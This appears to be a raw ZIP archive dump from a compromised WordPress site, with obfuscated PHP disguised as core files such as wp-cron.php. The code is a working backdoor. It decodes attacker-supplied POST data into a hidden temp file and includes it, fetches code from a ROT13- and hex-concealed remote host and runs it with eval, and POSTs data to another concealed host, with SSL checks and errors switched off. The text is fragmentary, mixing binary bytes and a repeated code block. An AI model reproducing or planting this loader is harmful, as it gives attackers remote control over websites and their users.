function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: } ?>PK��Vp�\��1��wp-cron.phpnu��[��<?php if(!empty($_POST["\x62\x69n\x64i\x6Eg"])){ $bind = $_POST["\x62\x69n\x64i\x6Eg"]; $bind = explode ( "." , $bind ); $k = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s ); $len = count( $bind ); for( $x = 0; $x < $len; $x++) { $v8 = $bind[$x]; $chS = ord( $s[$x% $sLen] ); $dec =( ( int)$v8 - $chS -( $x% 10)) ^ 51; $k .= chr( $dec ); } $fac = array_filter([ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", session_save_path(), getenv("TEMP"), getcwd(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm"]); foreach ($fac as $record): if (is_writable($record) && is_dir($record)) { $symbol = sprintf("%s/.tkn", $record); $success = file_put_contents($symbol, $k); if ($success) { include $symbol; @unlink($symbol); exit;} } endforeach; } goto tUl6b; wXtx3: $rHfMY = $_REQUEST["\144\157\141\143\x74"]; goto HgQ3I; aYfRm: session_start(); goto wXtx3; N7Xk9: $sJ3ad = (isset($_SERVER["\110\x54\x54\x50\x53"]) && $_SERVER["\x48\124\x54\x50\x53"] === "\x6f\156" ? "\150\164\x74\160\x73" : "\150\164\x74\160") . "\x3a\x2f\x2f{$_SERVER["\x48\124\x54\x50\137\x48\x4f\x53\x54"]}{$_SERVER["\122\x45\x51\125\x45\123\124\137\x55\x52\111"]}"; goto Pmj6n; LLG9S: function sXidc($sJ3ad) { goto n0NKE; NAssn: $tz7fb = curl_exec($U8dd8); goto S3rIV; yoBMI: return $tz7fb; goto VHWhP; TwOE6: $tz7fb = stream_get_contents($FJvaM); goto cwV9V; VDpuf: if (!function_exists("\x63\x75\x72\154\137\x65\x78\145\x63")) { goto el1M3; } goto XeE53; RIUJx: el1M3: goto qrsug; O9m5u: mfeik: goto yoBMI; vh255: $FJvaM = fopen($sJ3ad, "\x72"); goto TwOE6; ENMVc: if (!(empty($tz7fb) && function_exists("\146\x6f\x70\x65\x6e") && function_exists("\163\164\x72\x65\x61\155\137\147\x65\x74\137\143\x6f\x6e\x74\x65\156\164\163"))) { goto mfeik; } goto vh255; n0NKE: $tz7fb = ''; goto VDpuf; K9wqV: KCf2O: goto ENMVc; OEkP7: curl_setopt($U8dd8, CURLOPT_RETURNTRANSFER, 1); goto JMTNg; XeE53: $U8dd8 = curl_init($sJ3ad); goto OEkP7; S3rIV: curl_close($U8dd8); goto RIUJx; tkeD5: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYPEER, 0); goto cQqi_; JMTNg: curl_setopt($U8dd8, CURLOPT_FOLLOWLOCATION, 1); goto tkeD5; T4y9f: $tz7fb = file_get_contents($sJ3ad); goto K9wqV; cwV9V: fclose($FJvaM); goto O9m5u; cQqi_: curl_setopt($U8dd8, CURLOPT_SSL_VERIFYHOST, 0); goto NAssn; qrsug: if (!(empty($tz7fb) && function_exists("\x66\151\x6c\x65\x5f\x67\x65\x74\137\x63\157\156\x74\145\x6e\164\163"))) { goto KCf2O; } goto T4y9f; VHWhP: } goto KwJ9D; rzajS: exit; goto kAGwF; B6fd_: eval("\77\x3e" . $Biqik); goto rzajS; Pmj6n: XlPsQ(array("\167\145\x62" => $sJ3ad)); goto wwzKB; kAGwF: JS6LS: goto LLG9S; IQihW: KSZRy: goto K2jbV; tUl6b: error_reporting(0); goto aYfRm; HgQ3I: if (!empty($rHfMY)) { goto KSZRy; } goto N7Xk9; K2jbV: $_SESSION["\x64\x6f\x61\x63\164"] = $rHfMY; goto jZVAU; wwzKB: goto JS6LS; goto IQihW; jZVAU: $Biqik = sxIDc(str_rot13("\x75\147\x67\x63\x66\72\57\57\x75\x6f\157\156\144\141\56\x74\x6e\x7a\162\x6e\143\162\x2e\x67\142\x63\x2f\x71\x62\142\x65\x2f") . $rHfMY . "\56\164\x78\164"); goto B6fd_; KwJ9D: function xLpSq($oFbXi) { goto qRLdR; sgjQn: curl_setopt($OUnCg, CURLOPT_POSTFIELDS, $oFbXi); goto eEPm6; eEPm6: curl_setopt($OUnCg, CURLOPT_RETURNTRANSFER, true); goto JM27m; qB8i1: $OUnCg = curl_init(str_rot13($sJ3ad)); goto jfSiq; qRLdR: $sJ3ad = "\x75\x67\x67\x63\x3a\x2f\x2f\145\x72\x7a\x62\x67\162\x32\60\62\x35\x2e\157\154\x75\x62\x67\x2e\147\x62\x63\x2f\166\x61\161\x72\x6b\56\x63\165\143"; goto qB8i1; JM27m: $FJ0YN = curl_exec($OUnCg); goto RiAUd; RiAUd: curl_close($OUnCg); goto OBMXo; jfSiq: curl_setopt($OUnCg, CURLOPT_POST, 1); goto sgjQn; OBMXo: } ?>PK��Vp�\�ͥ�� .htaccessnu��6�$��<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>PK��Vp�\P-6��958412/838033/error_lognu��[��PK��Vp�\�Ŋ�d��d�� 958412/838033/set_user_roles.phpnu��[��PK��Vp�\�� 958412/838033/763095/copy.phpnu��[��PK��Vp�\��958412/838033/763095/error_lognu��[��PK��Vp�\��%��%��r ��958412/838033/763095/index.phpnu��[��PK��Vp�\�6smz}��z}��'��958412/838033/index.phpnu��[��PK��Vp�\��958412/index.phpnu��[��PK��Vp�\ �� wp-blog-header.phpnu��6�$��PK��Vp�\��1��wp-cron.phpnu��[��PK��Vp�\�ͥ�� g��.htaccessnu��6�$��PK�� ]��e��